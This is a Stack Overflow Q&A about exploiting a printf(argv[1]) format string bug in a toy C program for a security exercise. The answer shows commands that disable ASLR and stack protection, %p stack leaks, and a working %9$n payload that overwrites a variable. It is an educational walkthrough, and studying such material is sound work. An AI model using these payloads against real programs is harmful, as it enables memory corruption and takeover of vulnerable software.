# How to use Format String Attack

Tags: c, string, security, printf, format-string

Assume I have the following code:

```
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

int num1 = 0;

int main(int argc, char **argv){
    double num2;
    int *ptr = &num1;
    printf(argv[1]);

    if (num1== 2527){
        printf("Well done");
    }
    if(num2 == 4.56)
        printf("You are a format string expert");
    return 0;
}
```

I am trying to understand how to do it right but I just can't organize my mind with the guides on the internet.

Is it suppose to something like:

```
./Program %p %p %p %p
```

and then

```
 ./Program $( printf "\xAA\xAA\xAA\xAA") %.2523d%n
```

I just can't figure this out,
Please help me through with it.

**The main point of this is to exploit a string into a running program through the prinft function. I need to get both "Well done" and "You are a format string expert" to be printed.
In my case, through Linux terminal/shell.
As HuStmpHrrr notice: This is indeed supposed to be White Hacking - Software Security**

Comment: is it even compiling? `numb` ==> what? `printf(argv[1]);` ==> what if `NULL`?

Comment: `if(numb = 4.56)` has a typo. You need `==`.

Comment: @Bathsheba before that, `numb` should be defined [ok, least, declared]. otherwise, **it is [numb](http://www.thefreedictionary.com/numb)**.

Comment: @Bathsheba You are right, didn't notice. I edited the question :)

Comment: What exactly are you trying to do?

Comment: @SouravGhosh The "double num2;" was something I added because I was interested how to do it with double number. But aside than the numb and the == stuff which I wrote on the way, be sure that it did compiled.

Comment: possible duplicate of [How can a Format-String vulnerability be exploited?](http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability-be-exploited)

Comment: @Guy: if the answers in the linked question don't solve your problem, you are welcome to edit this one to ask somebody to expand on your specific issue.

Comment: @MichaelFoukarakis Thank you for notice me. I edited it to make it clear what my goal is. the "How can a Foramt..." guide is very detailed. But again, I wasn't able to use it right for my case.

Comment: In your setting, do you have ASLR activated or not?

Comment: @OrtomalaLokni Nope, no ASLR.

Answer (score 9, accepted):

First of all I recommend that you read the book `Hacking: The Art of Exploitation`. It is very good.

Now I try to explain how you can exploit your program. I assume that you know some basics about Format String Exploits, so I don't have to start from the very beginning.
However it is important to disable ASLR and compile the executable without stack protection.

```
# disable ASLR
@> echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# compile without stack protection
@> gcc -g -fno-stack-protector -z execstack fmt.c
```

I modified your program a little bit, so it is easier to understand how the exploit works:

```
#include <stdio.h>

int num1 = 0xdead;

int main(int argc, char **argv){
    int num2 = 0xbeef;
    int *ptr = &num1;
    printf(argv[1]);

    if (num1 == 0xabc){
        printf("Well done");
    }
    if(num2 == 0xdef)
        printf("You are a format string expert");

    printf("\n[DEBUG] num1: 0x%x [%p] num2: 0x%x [%p]\n", num1, &num1, num2, &num2);
    return 0;
}
```

I am using a 64-Bit Ubunty System. The pointer size is 8 bytes.

**The Exploit**

***variable num1***

First we try to change the variable `num1`. The address of `num1` is stored in `ptr`. `ptr` is a local variable in main, so it is put on the stack (type int*). To examine the stack we can use the `%p` format specifier.

```
@> ./a.out %p.%p.%p.%p.%p.%p.%p.%p.%p
```

Output:

```
0x7fffffffdf78.0x7fffffffdf90.(nil).0x7ffff7dd4e80.0x7ffff7dea560.0x7fffffffdf78.0x200400440.0xbeefffffdf70.0x601040
[DEBUG] num1: 0xdead [0x601040] num2: 0xbeef [0x7fffffffde84]
```

We can see that the 9th element has the value `0x601040`. That is the same like the value in our debug message `num1: 0xdead [0x601040]`. Now we know that `0x601040` is the pointer to the variable num1 and it is located on the stack. To change that value (write in memory) we can use the `%n` format specifier in combination with the Direct Parameter Access `%9$n` to write to the address that is stored in the 9th stack position.

To gain access to the **Well done** message we only need to write `0xabc` values to stdout and use `%n` to write that number in memory:

```
@> ./a.out `python -c "print('A' * 0xabc)"`%9\$n
```

I use python to generate that output.
Now the program prints "Well done".

***variable num2***

If we take a close look to the output we see that the 8th element has the value `beef`. That is our variable `num2`. I still did not figure out, how to exploit `num2` but I try to explain how to do it in theory.
We want to put an arbitrary memory address on the stack. This address should be the address that points to num2 (`0x7fffffffde84`). After that we can use the `%n` parameter to write to that address. To put an address on the stack we can use the format string.

```
@> ./a.out `printf "\x08\x07\x06\x05\x04\x03\x02\x01"`
```

The problem is that we have to find the location of this format string on the stack.

```
@> ./a.out AAAA`printf "\x08\x07\x06\x05\x04\x03\x02\x01"`BBBB`python -c "print('%p.' * 200)"`
```

The 'A's and 'B's are just padding and it is also easier to find our address in the output.
The exploit looks similar to the num1 exploit way:

```
@> ./a.out ADDRESS`python -c "print('A' * VAL_TO_WRITE)"`PADDING%LOCATION_OF_ADDRESS\$n
```

The problem: In our scenario the address of `num2` is `0x7fffffffde84` (that is `0x00007fffffffde84`). That address can not be written because 0x00 is the C-String Terminator. So we can not put the address in our format string.

Comment: It does work for the "Well done" if I write "./Program python -c "print('A' * 0x9df)"%7\$n" . But what is the equivalent in printf (without using python). And why does the it print 2529 of "A"s ? (For 0x537 it prints 1024 of 'A')

Comment: The code `python -c "print('A' * n)` prints `n` "A" characters to stdout. In your case `python -c "print('A' * 0x9df)` prints 0x9df (hex) = 2527 (dec) "A"s. You have to do that to write the wanted number with the format string specifier `%n`. I am no expert in bash programming but you could do it like that `printf 'A%.0s' {1..2527} && echo %9\$n`.

Comment: Thank you, I will wait for another answer for the float part. It is interesting though what and how he managed to wrote into an arbitrary address in memory (Direct to a specific address) in [link](http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability-be-exploited) - Will it work on python too? And if so, how to enter a number without using 2527 dummy letters before the %n?

Comment: Yes it also works with python. It is not possible to do the exploit without printing 2572 characters because that's the way `%n` works. You could replace the 'A' character with '.' or something different but you have to print it.